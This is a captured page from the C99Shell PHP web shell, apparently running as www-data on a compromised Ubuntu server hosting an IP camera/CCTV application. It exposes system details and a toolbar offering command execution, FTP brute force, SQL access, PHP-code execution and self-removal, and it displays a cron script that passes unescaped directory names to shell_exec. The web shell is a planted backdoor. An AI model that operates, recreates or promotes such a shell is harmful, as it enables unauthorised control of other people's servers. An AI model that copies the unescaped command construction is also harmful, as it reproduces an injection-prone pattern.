!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/ipcam-cctv/cron/   drwxr-xr-x
Free 13.18 GB of 57.97 GB (22.74%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     remove-empty-files.php (1.57 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    
require_once(dirname(__FILE__).'/../control/config.php');
    require_once(
dirname(__FILE__).'/../include/config.php');

    
$global = new config($database);
    
$config config::config_dump($database);

    if (
file_exists($global->config_data['lock_directory']."/remove-empty-files.lock")) { exit; }

    
touch($global->config_data['lock_directory']."/remove-empty-files.lock");

    foreach (
$config as $cnf) {
        if (isset(
$cnf['recording_directory']) || isset($cnf['log_directory'])) {
            if (!isset(
$cnf['recording_directory'])) { $cnf['recording_directory'] = $global->config_data['recording_directory']; }
            if (!isset(
$cnf['log_directory'])) { $cnf['log_directory'] = $global->config_data['log_directory']; }
            
$empty shell_exec("ls -l ".$cnf['recording_directory']."/ | tr -s ' ' | cut -d ' ' -f 5,8,9 | egrep '^[0-9]{1,3}\ ' | cut -d ' ' -f 3");
            
$empty preg_split('/\n/'$empty);
            foreach (
$empty as $e) {
                if (
$e == "") { continue; }
                
$opens shell_exec("lsof ".$cnf['recording_directory']."/".$e." | wc -l");
                if (
$opens == 0) {
                    
unlink($cnf['recording_directory']."/".$e);
                    echo 
"Removed empty file: ".$e."\n";
                    
$logfile preg_replace('/\.[^\.]*$/''.log'$e);
                    
unlink($cnf['log_directory']."/".$logfile);
                    echo 
"Removed logfile: ".$logfile."\n";
                }
            }
        }
    }

    
unlink($global->config_data['lock_directory']."/remove-empty-files.lock");
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0043 ]--